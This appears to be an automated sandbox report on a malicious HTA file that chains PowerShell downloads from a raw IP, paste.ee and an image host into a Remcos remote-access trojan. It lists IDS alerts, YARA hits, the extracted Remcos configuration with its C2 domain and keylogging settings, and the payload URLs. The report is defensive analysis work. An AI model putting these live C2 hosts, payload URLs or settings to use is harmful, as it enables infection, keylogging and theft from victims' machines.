                          2024-12-17T09:46:45.853119+010020365941Malware Command and Control Activity Detected192.168.2.849716192.169.69.266946TCP
                          2024-12-17T09:46:57.358388+010020365941Malware Command and Control Activity Detected192.168.2.849717192.169.69.266946TCP
                          2024-12-17T09:47:09.271645+010020365941Malware Command and Control Activity Detected192.168.2.849718192.169.69.266946TCP
                          2024-12-17T09:47:21.244622+010020365941Malware Command and Control Activity Detected192.168.2.849719192.169.69.266946TCP
                          2024-12-17T09:47:32.806975+010020365941Malware Command and Control Activity Detected192.168.2.849720192.169.69.266946TCP
                          2024-12-17T09:47:44.433551+010020365941Malware Command and Control Activity Detected192.168.2.849721192.169.69.266946TCP
                          2024-12-17T09:47:55.939914+010020365941Malware Command and Control Activity Detected192.168.2.849722192.169.69.266946TCP
                          2024-12-17T09:48:07.482455+010020365941Malware Command and Control Activity Detected192.168.2.849723192.169.69.266946TCP
                          2024-12-17T09:48:19.407973+010020365941Malware Command and Control Activity Detected192.168.2.849724192.169.69.266946TCP
                          2024-12-17T09:48:30.903940+010020365941Malware Command and Control Activity Detected192.168.2.849725192.169.69.266946TCP
                          2024-12-17T09:48:42.366701+010020365941Malware Command and Control Activity Detected192.168.2.849726192.169.69.266946TCP
                          2024-12-17T09:48:53.785689+010020365941Malware Command and Control Activity Detected192.168.2.849727192.169.69.266946TCP
                          2024-12-17T09:49:05.353258+010020365941Malware Command and Control Activity Detected192.168.2.849728192.169.69.266946TCP
                          2024-12-17T09:49:16.745037+010020365941Malware Command and Control Activity Detected192.168.2.849729192.169.69.266946TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-12-17T09:45:26.721534+010020490381A Network Trojan was detected151.101.193.137443192.168.2.849707TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-12-17T09:45:48.724564+010028582951A Network Trojan was detected172.67.187.200443192.168.2.849710TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-12-17T09:45:15.419357+010028587951A Network Trojan was detected192.168.2.84970623.95.235.2980TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-12-17T09:45:47.365542+010028410751Malware Command and Control Activity Detected192.168.2.849710172.67.187.200443TCP

                          Click to jump to signature section

                          Show All Signature Results

                          AV Detection

                          barindex
                          Source: http://23.95.235.29/118/freesizedressfornaturalbeautyinthiscaseforyougood.tIFAvira URL Cloud: Label: malware
                          Source: submarrine.duckdns.orgAvira URL Cloud: Label: malware
                          Source: 0000000C.00000002.3841776803.0000000001028000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": ["submarrine.duckdns.org:6946:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-GH3PRL", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
                          Source: greatnicefeatureswithsupercodebnaturalthingsinlineforgiven.htaVirustotal: Detection: 27%Perma Link
                          Source: greatnicefeatureswithsupercodebnaturalthingsinlineforgiven.htaReversingLabs: Detection: 21%
                          Source: Yara matchFile source: 12.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 8.2.powershell.exe.7205a48.1.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 12.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 8.2.powershell.exe.7205a48.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0000000C.00000002.3843532128.0000000002DBE000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000000C.00000002.3841776803.0000000001028000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000008.00000002.1784462151.0000000007165000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000008.00000002.1784462151.00000000062FB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 8184, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 6832, type: MEMORYSTR
                          Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                          Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0043293A CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,12_2_0043293A
                          Source: powershell.exe, 00000008.00000002.1784462151.0000000007165000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_37728ba9-1

                          Exploits

                          barindex
                          Source: Yara matchFile source: 12.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 8.2.powershell.exe.7205a48.1.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 12.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 8.2.powershell.exe.7205a48.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000008.00000002.1784462151.0000000007165000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000008.00000002.1784462151.00000000062FB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 8184, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 6832, type: MEMORYSTR

                          Privilege Escalation

                          barindex
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00406764 _wcslen,CoGetObject,12_2_00406764

                          Phishing

                          barindex
                          Source: Yara matchFile source: greatnicefeatureswithsupercodebnaturalthingsinlineforgiven.hta, type: SAMPLE
                          Source: unknownHTTPS traffic detected: 151.101.193.137:443 -> 192.168.2.8:49707 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 172.67.187.200:443 -> 192.168.2.8:49710 version: TLS 1.2
                          Source: Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 00000008.00000002.1784462151.0000000006E40000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: stem.Management.Automation.pdb source: powershell.exe, 00000003.00000002.1511324447.0000000006FF7000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: dnlib.dotnet.pdb source: powershell.exe, 00000008.00000002.1820180865.0000000007A8A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1819229489.00000000075E0000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 00000008.00000002.1784462151.0000000006E40000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 00000008.00000002.1784462151.0000000006E40000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 00000008.00000002.1784462151.0000000006E40000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: dnlib.DotNet.Pdb.PdbWriter+b source: powershell.exe, 00000008.00000002.1784462151.0000000006E40000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.1513173387.0000000008035000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: dnlib.dotnet.pdb.dss source: powershell.exe, 00000008.00000002.1820180865.0000000007A8A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1819229489.00000000075E0000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 00000008.00000002.1784462151.0000000006E40000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: q8C:\Users\user\AppData\Local\Temp\eykjjr5p\eykjjr5p.pdb source: powershell.exe, 00000003.00000002.1506870890.0000000004D35000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: dnlib.dotnet.resourcesresourceelementdnlib.dotnetmodulecreationoptionsijikiddnlib.dotnet.emitiinstructionoperandresolverieigdnlib.utilslazylist`1iaibdnlib.dotnetpropertyattributesicdnlib.dotnet.mdrawmethodrowdnlib.dotnet.mdrawassemblyrowdnlib.threadingexecutelockeddelegate`3dnlib.dotnetmoduledefmddnlib.ioiimagestreamixiydnlib.dotnetclasssigizdnlib.dotnetstrongnamesignerdnlib.dotnetinvalidkeyexceptionitiuelemequalitycompareriviwipiqdnlib.dotnet.mdrawpropertyptrrowirisdnlib.threadinglistiteratealldelegate`1microsoft.win32.taskscheduler.fluentbasebuilderdnlib.dotnet.mdheapstreamdnlib.pepeimagednlib.dotnetitypedeffindermicrosoft.win32.taskschedulersnapshotitemdnlib.dotnetmemberrefdnlib.dotnetimemberrefresolverdnlib.dotnetconstantuserdnlib.dotnetimethoddecrypterdnlib.dotnetassemblynamecomparerdnlib.dotnetiresolutionscopednlib.dotnetsecurityattributednlib.dotnet.writerpeheadersoptionsdnlib.dotnet.writerioffsetheap`1dnlib.dotnetimethoddnlib.dotnetcorlibtypesdnlib.dotnet.writertablesheapdnlib.dotnet.emitopcodetypednlib.dotnetiassemblyresolverdnlib.dotnetassemblyattributesdnlib.dotneticustomattributetypednlib.dotnetdummyloggerdnlib.dotnet.mdrawfieldptrrowdnlib.dotnetiloggermicrosoft.win32.taskschedulerdailytriggerdnlib.dotnettyperefuserdnlib.dotnet.writerdummymodulewriterlistenerdnlib.dotnetassemblyhashalgorithmdnlib.dotnet.pdbpdbdocumentdnlib.dotnetpinvokeattributesdnlib.dotnetivariablednlib.dotnetresourcednlib.dotnet.writerchunklist`1dnlib.dotnetiistypeormethodmicrosoft.win32.taskschedulercustomtriggerdnlib.dotnet.writerstartupstubdnlib.dotnetgenericinstmethodsigdnlib.dotnetmemberrefuserdnlib.dotnet.mdcomimageflagsdnlib.dotnetgenericparamdnlib.dotnet.writerchunklistbase`1dnlib.utilsextensionsdnlib.dotnetnativetypednlib.dotnet.mdrawenclogrowdnlib.dotnetgenericparamcontextdnlib.peimageoptionalheader64dnlib.dotnet.mdrawnestedclassrowdnlib.dotnetextensionsdnlib.dotneteventdefdnlib.dotnet.emitlocalc`5dnlib.dotneticontainsgenericparameterb`3b`1b`1b`1dnlib.dotnetitokenoperandc`1dnlib.dotnet.writerimdtablednlib.pedllcharacteristicsdnlib.dotnetifullnamednlib.dotnet.resourcesresourcereaderdnlib.dotnetstrongnamepublickeydnlib.dotnet.mdrawassemblyprocessorrowdnlib.dotnetbytearrayequalitycomparerdnlib.dotnet.mdrawmethodsemanticsrowdnlib.ioiimagestreamcreatordnlib.dotnetvtablefixupsmicrosoft.win32.taskschedulertaskprincipalprivilegemicrosoft.win32.taskschedulertasksnapshotjojndnlib.dotnet.pdbsymbolreadercreatorjmjldnlib.dotnet.emitinstructionprinterdnlib.dotnettypeequalitycomparerjkjjdnlib.dotnet.mdimagecor20headerjidnlib.dotnet.mdirawrowjhdnlib.dotnet.writermethodbodywriterjgmicrosoft.win32.taskschedulertaskregistrationinfojfjejdjcmicrosoft.win32.taskschedulershowmessageactionjbdnlib.dotnetihasdeclsecuritycomhandlerupdatejamicrosoft.win32.taskschedulereventtriggerdnlib.dotnetimanagedentrypointstartup_informationmicrosoft.win32.taskscheduler.fluentmonthlydowtriggerbuildermicrosoft.win32.taskschedulertaskauditrulejzjyjxdnlib.dotnet.writerstrongnamesignaturednlib.dotne
                          Source: Binary string: dnlib.dotnet.pdb.managed source: powershell.exe, 00000008.00000002.1820180865.0000000007A8A000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: dnlib.DotNet.Pdb source: powershell.exe, 00000008.00000002.1784462151.0000000006E40000.00000004.00000800.00020000.00000000.sdmp
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0040B335 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,12_2_0040B335
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0041B42F FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,12_2_0041B42F
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0040B53A FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,12_2_0040B53A
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0044D5E9 FindFirstFileExA,12_2_0044D5E9
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_004089A9 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8,12_2_004089A9
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00406AC2 FindFirstFileW,FindNextFileW,12_2_00406AC2
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00407A8C __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,12_2_00407A8C
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00418C69 FindFirstFileW,FindNextFileW,FindNextFileW,12_2_00418C69
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00408DA7 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,12_2_00408DA7
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00406F06 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,12_2_00406F06

                          Software Vulnerabilities

                          barindex
                          Source: C:\Windows\SysWOW64\wscript.exeChild: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

                          Networking

                          barindex
                          Source: Network trafficSuricata IDS: 2858795 - Severity 1 - ETPRO MALWARE ReverseLoader Payload Request (GET) M2 : 192.168.2.8:49706 -> 23.95.235.29:80
                          Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.8:49711 -> 192.169.69.26:6946
                          Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.8:49719 -> 192.169.69.26:6946
                          Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.8:49714 -> 192.169.69.26:6946
                          Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.8:49722 -> 192.169.69.26:6946
                          Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.8:49715 -> 192.169.69.26:6946
                          Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.8:49723 -> 192.169.69.26:6946
                          Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.8:49720 -> 192.169.69.26:6946
                          Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.8:49716 -> 192.169.69.26:6946
                          Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.8:49724 -> 192.169.69.26:6946
                          Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.8:49721 -> 192.169.69.26:6946
                          Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.8:49725 -> 192.169.69.26:6946
                          Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.8:49729 -> 192.169.69.26:6946
                          Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.8:49717 -> 192.169.69.26:6946
                          Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.8:49712 -> 192.169.69.26:6946
                          Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.8:49728 -> 192.169.69.26:6946
                          Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.8:49726 -> 192.169.69.26:6946
                          Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.8:49727 -> 192.169.69.26:6946
                          Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.8:49718 -> 192.169.69.26:6946
                          Source: Network trafficSuricata IDS: 2049038 - Severity 1 - ET MALWARE ReverseLoader Reverse Base64 Loader In Image M2 : 151.101.193.137:443 -> 192.168.2.8:49707
                          Source: Network trafficSuricata IDS: 2020424 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 2 M1 : 172.67.187.200:443 -> 192.168.2.8:49710
                          Source: Network trafficSuricata IDS: 2020425 - Severity 1 - ET EXPLOIT_KIT ReverseLoader Base64 Payload Inbound M2 : 172.67.187.200:443 -> 192.168.2.8:49710
                          Source: Network trafficSuricata IDS: 2858295 - Severity 1 - ETPRO MALWARE ReverseLoader Base64 Encoded EXE With Content-Type Mismatch (text/plain) : 172.67.187.200:443 -> 192.168.2.8:49710
                          Source: Malware configuration extractorURLs: submarrine.duckdns.org
                          Source: unknownDNS query: name: paste.ee
                          Source: unknownDNS query: name: submarrine.duckdns.org
                          Source: Yara matchFile source: 8.2.powershell.exe.6f073a8.0.raw.unpack, type: UNPACKEDPE
                          Source: global trafficHTTP traffic detected: GET /dzvai86uh/image/upload/v1734050991/unxaooiykxfmw9pan4z1.jpg HTTP/1.1Host: res.cloudinary.comConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /r/qVzWL/0 HTTP/1.1Host: paste.eeConnection: Keep-Alive
                          Source: Joe Sandbox ViewIP Address: 172.67.187.200 172.67.187.200
                          Source: Joe Sandbox ViewIP Address: 172.67.187.200 172.67.187.200
                          Source: Joe Sandbox ViewIP Address: 23.95.235.29 23.95.235.29
                          Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
                          Source: Joe Sandbox ViewASN Name: WOWUS WOWUS
                          Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                          Source: Network trafficSuricata IDS: 2841075 - Severity 1 - ETPRO MALWARE Terse Request to paste .ee - Possible Download : 192.168.2.8:49710 -> 172.67.187.200:443
                          Source: global trafficHTTP traffic detected: GET /118/freesizedressfornaturalbeautyinthiscaseforyougood.tIF HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 23.95.235.29Connection: Keep-Alive
                          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
                          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
                          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
                          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
                          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
                          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
                          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
                          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
                          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
                          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
                          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
                          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
                          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
                          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
                          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
                          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
                          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
                          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
                          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
                          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
                          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
                          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
                          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
                          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
                          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
                          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
                          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
                          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
                          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
                          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
                          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
                          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
                          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
                          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
                          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
                          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
                          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
                          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
                          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
                          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
                          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
                          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
                          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
                          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
                          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
                          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
                          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
                          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
                          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
                          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_04847A18 URLDownloadToFileW,3_2_04847A18
                          Source: global trafficHTTP traffic detected: GET /dzvai86uh/image/upload/v1734050991/unxaooiykxfmw9pan4z1.jpg HTTP/1.1Host: res.cloudinary.comConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /r/qVzWL/0 HTTP/1.1Host: paste.eeConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /118/freesizedressfornaturalbeautyinthiscaseforyougood.tIF HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 23.95.235.29Connection: Keep-Alive
                          Source: global trafficDNS traffic detected: DNS query: res.cloudinary.com
                          Source: global trafficDNS traffic detected: DNS query: paste.ee
                          Source: global trafficDNS traffic detected: DNS query: submarrine.duckdns.org
                          Source: powershell.exe, 00000003.00000002.1513173387.0000000008035000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://23.95.235.29/
                          Source: powershell.exe, 00000003.00000002.1506870890.0000000004D35000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://23.95.235.29/118/freesize
                          Source: powershell.exe, 00000003.00000002.1506870890.0000000004D35000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1513173387.0000000008035000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1511477810.0000000007019000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1511477810.00000000070D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://23.95.235.29/118/freesizedressfornaturalbeautyinthiscaseforyougood.tIF
                          Source: powershell.exe, 00000003.00000002.1513173387.0000000008035000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://23.95.235.29/118/freesizedressfornaturalbeautyinthiscaseforyougood.tIF9
                          Source: powershell.exe, 00000003.00000002.1511477810.00000000070D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://23.95.235.29/118/freesizedressfornaturalbeautyinthiscaseforyougood.tIFC:
                          Source: powershell.exe, 00000003.00000002.1513173387.0000000008035000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://23.95.235.29/118/freesizedressfornaturalbeautyinthiscaseforyougood.tIFT
                          Source: powershell.exe, 00000003.00000002.1513173387.0000000008035000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://23.95.235.29/118/freesizedressfornaturalbeautyinthiscaseforyougood.tIFon
                          Source: powershell.exe, 00000003.00000002.1513173387.0000000008035000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://23.95.235.29/118/freesizedressfornaturalbeautyinthiscaseforyougood.tIFsoft.WindowsErrorReport
                          Source: powershell.exe, 00000003.00000002.1505549231.0000000002906000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microG
                          Source: powershell.exe, 00000003.00000002.1513173387.0000000008035000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microM~
                          Source: powershell.exe, 00000003.00000002.1513173387.0000000008035000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft
                          Source: CasPol.exeString found in binary or memory: http://geoplugin.net/json.gp
                          Source: powershell.exe, 00000008.00000002.1784462151.0000000007165000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1784462151.00000000062FB000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp/C
                          Source: powershell.exe, 00000003.00000002.1506870890.0000000005092000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://go.micros
                          Source: powershell.exe, 00000003.00000002.1509414066.000000000597B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1784462151.00000000062FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                          Source: powershell.exe, 00000008.00000002.1784462151.00000000053E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                          Source: powershell.exe, 00000003.00000002.1506870890.0000000004A68000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                          Source: powershell.exe, 00000003.00000002.1506870890.0000000004911000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1784462151.0000000005291000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                          Source: powershell.exe, 00000003.00000002.1506870890.0000000004A68000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                          Source: powershell.exe, 00000008.00000002.1784462151.00000000053E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
